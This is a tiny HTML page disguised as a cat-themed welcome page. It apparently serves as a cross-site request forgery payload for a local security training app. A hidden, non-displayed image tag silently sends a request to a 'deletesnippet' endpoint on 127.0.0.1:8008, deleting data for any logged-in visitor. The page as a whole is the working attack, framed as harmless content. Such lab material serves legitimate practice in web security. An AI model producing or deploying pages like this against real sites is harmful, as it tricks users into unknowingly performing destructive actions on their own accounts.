<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome to my page</title>
</head>
<body>
    <h1>Hello! Welcome to my page</h1>
    <p>This is a page dedicated to cats, and does not hack you ;)</p>

    <img src="https://cdn.hswstatic.com/gif/persian-cat-1.jpg" alt="">
    <img src="http://127.0.0.1:8008/.../deletesnippet?index=0" style="display: none;">
</body>
</html>